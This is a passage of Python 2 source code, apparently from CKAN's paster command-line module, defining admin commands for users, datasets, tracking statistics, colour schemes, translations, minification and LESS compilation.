for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
error('Passwords do not match')
return password1
def add(self):
user_add(self.args[1:])
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
p.toolkit.get_action('user_delete')(
{'model': model, 'ignore_auth': True},
{'id': username})
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.logic as logic
dataset = self._get_dataset(dataset_ref)
name = dataset.name
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
context = {'user': site_user['name']}
logic.get_action('dataset_purge')(
context, {'id': dataset_ref})
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon [DEPRECATED]
This command is DEPRECATED, use `paster jobs` instead.
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
error('Command %s not recognized' % cmd)
def run_(self):
deprecation_warning(u'Use `paster jobs worker` instead.')
default_ini = os.path.join(os.getcwd(), 'development.ini')
if self.options.config:
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
elif os.path.isfile(default_ini):
os.environ['CKAN_CONFIG'] = default_ini
else:
error('No .ini specified and none was found in current directory')
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
celery_args.append['--concurrency=1']
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
deprecation_warning(u'Use `paster jobs list` instead.')
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
deprecation_warning(u'Use `paster jobs clear` instead.')
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
error('Failed to delete all tasks')
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id is None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id is None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
error(self.__class__.__doc__)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
error(self.__class__.__doc__)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql, measure_from=str(measure_from)).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)=%s;
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;'''
engine.execute(sql, summary_date)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print '%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date)
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print "Error: package %s not found." % (package_id)
not_found += 1
except KeyboardInterrupt:
print "Stopped."
return
except:
raise
print 'search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else "")
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class': item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc': plugin.__doc__,
'class': plugin,
'implements': []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by pstats.Stats (command-line) or runsnakerun (gui).
Usage:
profile URL [username]
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
if self.args[1:]:
user = self.args[1]
else:
user = 'visitor'
def profile_url(url):
try:
res = self.app.get(url, status=[200],
extra_environ={'REMOTE_USER': user})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except Exception:
error(traceback.format_exc())
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
import pstats
stats = pstats.Stats(output_filename)
stats.sort_stats('cumulative')
stats.print_stats(0.1) # show only top 10% of lines
print 'Only top 10% of lines shown'
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses as base color eg '#ff00ff' must be quoted.
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0fff8',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors = []
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color = '#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
f.close
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from ckan.common import config
from ckan.lib.i18n import build_js_translations
ckan_path = os.path.join(os.path.dirname(__file__), '..')
self.i18n_path = config.get('ckan.i18n_directory',
os.path.join(ckan_path, 'i18n'))
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
build_js_translations()
else:
print 'command not recognised'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations fot zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False,
help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file or a dir?
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minifed.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create [options] [type1] [type2] ...
Create views on relevant resources. You can optionally provide
specific view types (eg `recline_view`, `image_view`). If no types
are provided, the default ones will be used. These are generally
the ones defined in the `ckan.views.default_views` config option.
Note that on either case, plugins must be loaded (ie added to
`ckan.plugins`), otherwise the command will stop.
paster views clear [options] [type1] [type2] ...
Permanently delete all views or the ones with the provided types.
paster views clean
Permanently delete views for all types no longer present in the
`ckan.plugins` configuration option.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def __init__(self, name):
